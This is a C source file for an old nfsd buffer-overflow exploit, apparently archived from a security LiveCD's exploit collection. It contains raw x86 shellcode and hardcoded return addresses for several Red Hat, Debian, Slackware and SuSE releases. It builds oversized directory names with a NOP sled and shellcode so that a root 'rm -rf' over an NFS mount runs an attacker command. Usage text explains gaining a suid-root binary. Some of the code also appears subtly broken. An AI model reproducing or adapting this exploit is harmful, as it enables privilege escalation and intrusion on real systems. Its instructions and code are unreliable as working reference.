home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / rpc / nfsd.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  4.8 KB  |  179 lines
  1. /*
  2.  *
  3.  * -> THIS IS VERY PRIVATE AND IS NOT TO BE DISTRIBUTED <-
  4.  *
  5.  * 
  6.  * author: tmoggie
  7.  * greetz: 
  8.  *         DiGiT - bug discovering, 
  9.  *         kil3r, maxiu and all of lam3rZ GrP
  10.  *                                  
  11.  */
  12.  
  13. #include <sys/stat.h>
  14. #include <sys/types.h>
  15. #include <fcntl.h>
  16. #include <unistd.h>
  17. #include <string.h>
  18.  
  19. #define green "\E[32m"
  20. #define bold "\E[1m"
  21. #define normal "\E[m"
  22. #define red "\E[31m"
  23.  
  24. char shellcode[] = "\xeb\x2d\x5a\x21\xee\xae\x41\xcd\x80\xfe\x51\xeb\xd2\xad\xdb"
  25.                    "\xb1\xc0\xb0\x46\xcd\x80\xc9\xd2\xbe\xf3\xb0\xc0\xcd\x80\x66"
  26.                    "\xb9\xff\x09\x89\xf3\xb0\x0f\xcd\x80\x21\xdb\x89\xd8\xfe\xc0"
  27.                    "\x6a\xff\xff\xfa\x50\xcd\x80\xdb\x89\xd8\xfe\xc0\xae\xeb\xd2"
  28.                    "\xcd\x80\xe8\xce\xff\xff\xff\xff\xff\xff/";
  29.  
  30. char *cmd = "cp /bin/sh /tmp/blah";
  31.  
  32. int offset = 132; //default offset
  33.  
  34.  
  35. void usage(char *prog)
  36. {
  37.   printf("\nusage: %s <-e dir> [-t target] [-c command] || %s <-h>\n",prog,prog);
  38.   printf("\n   -e dir    : full path to exported directory\n");
  39.   printf("   -t target : ");
  40.   printf("1 - RH 5.2 (default)   2 - Debian 2.1\n");
  41.   printf("3 - Slack 3.4          4 - Slack 3.6 2.1\n");
  42.   printf("5 - Slack 3.6, se      6 - SuSE 5.3\n");
  43.   printf("the rh 6.0 dosen't work atm :((((\n\n");
  44.   printf("   -c command: cmd to do as a normal user
  45.          (default: cp /bin/sh /tmp/blah)\n");
  46.   printf("   -h        : help, usage example\n\n");
  47.   exit(0);
  48. }
  49.  
  50. void example(char *prog)
  51. {
  52.   printf("Ok, let's say you wanna xploit Debian 2.1 with export:\n");
  53.   printf("\t/usr\t*(ro)\n");
  54.   printf("and you have some nice proggie which you want to make suid root:\n");
  55.   printf("\t/home/you/nice-proggie\n");
  56.   printf("If you have +w on /usr/tmp you have to do:\n");
  57.   printf("%s -e /usr/tmp -c \"cp /home/you/nice-proggie /tmp/blah\" -t 2\n",
  58.          prog);
  59.   printf("Next you have to mount the /usr on some box where you can do it;)\n");
  60.   printf("otherbox# mount -t nfs terget:/usr /mnt\n");
  61.   printf("otherbox# rm -rf /mnt/A[tab]\n\n");
  62.   printf("That's all...\n\n");
  63.   exit(0);
  64. }
  65.  
  66. void main(int argc, char **argv)
  67. {
  68.   int i,j;
  69.   char buf[4096];
  70.   char buf2[4096];
  71.   char tmp[4096];
  72.  
  73.   char exp[255] = "!";
  74.   int addr = 0xbffa3ad1 ; // RH 5.2
  75.  
  76.   while (1)
  77.     {
  78.       i = getopt(argc,argv,"e:c:t:h");
  79.       if (i == -1) break;
  80.       switch (i)
  81.         {
  82.         case 'e':
  83.           strcpy(exp,optarg);
  84.           break;
  85.         case 'c':
  86.           strcpy(cmd,optarg);
  87.           break;
  88.         case 't':
  89.           switch (j=atoi(optarg))
  90.             {
  91.             case 1:
  92.               addr = 0xbffeb567;
  93.               break; // debian 1.2
  94.             case 2:
  95.               addr = 0xbffa3ad1;
  96.               break; // rh 5.2
  97.             case 3:
  98.               addr = 0xbff9b5af;
  99.               break; // slack 3.4
  100.             case 4:
  101.               addr = 0xbffef205;
  102.               break; // slack 3.6, le
  103.             case 5:
  104.               addr = 0xbffef225;
  105.               break; // slack 3.6, se
  106.             case 6:
  107.               addr = 0xbfff0a5f;
  108.               break; // suse 5.3
  109.               //                     case 7: addr = 0xbfffe62f; break; // rh 6.0, dosen't work now :(((
  110.             }
  111.  
  112.         case 'h':
  113.           example(argv[0]);
  114.           break;
  115.         default :
  116.           usage(argv[0]);
  117.           break;
  118.         }
  119.     }
  120.   if (!strcmp(exp,"!")) usage(argv[0]);
  121.   printf(bold"cmd");
  122.   if (system(cmd) != 0)
  123.     {
  124.       printf(red"....failed!\n"normal);
  125.       exit(-1);
  126.     }
  127.   printf(normal green"\tOk\n"normal);
  128.  
  129.   bzero(exp,sizeof(exp));
  130.   strncpy(exp,argv[1],strlen(argv[1]));
  131.   offset = strlen(exp);
  132.   if (exp[offset-1] != '/') strcat(exp,"/");
  133.   offset = strlen(exp);
  134.   bzero(buf,sizeof(buf));
  135.   memset(tmp,'A',255);
  136.   tmp[255]='/';
  137.   tmp[256]='\0';
  138.   strncpy(buf,exp,offset);
  139.   printf(bold"dirs");
  140.   for (i=1;i<=3;i++)
  141.     {
  142.       strncat(buf,tmp,strlen(tmp));
  143.       if (mkdir(buf,0777) < 0)
  144.         {
  145.           printf(red"...fuck! can't create directory!!! : %d\n"normal,i);
  146.           exit(-1);
  147.         }
  148.     }
  149.   memset(tmp,'A',255);
  150.   tmp[255-offset]='/';
  151.   tmp[256-offset]='\0';
  152.   strncat(buf,tmp,strlen(tmp));
  153.   if (mkdir(buf,0777) < 0)
  154.     {
  155.       printf(red"...fuqn offset dirW#$#@%#$^%T#\n"normal);
  156.       exit(-1);
  157.     }
  158.   memset(tmp,'\x90',255);
  159.   strcpy(tmp+(255-strlen(shellcode)),shellcode);
  160.   strncat(buf,tmp,strlen(tmp));
  161.   if (mkdir(buf,0777) < 0)
  162.     {
  163.       printf(red"...fuck!@# shell-dir\n"normal);
  164.       exit(-1);
  165.     }
  166.   memset(tmp,'a',255);
  167.   tmp[97] = '\0';
  168.   *((int*)(tmp+93)) = addr;
  169.   strncat(buf,tmp,strlen(tmp));
  170.   if (mkdir(buf,0777) < 0)
  171.     {
  172.       printf(red"...fuck!@#!@#!$ addrez-dir ^\n"normal);
  173.       exit(-1);
  174.     }
  175.   printf(normal green"\tOk\n"normal);
  176.   printf("now you have to do: "bold green \
  177.          "rm -rf /path-to-mount-point/A[tab] & \n\n"normal);
  178. }
  179. /*                    www.hack.co.za              [2000]*/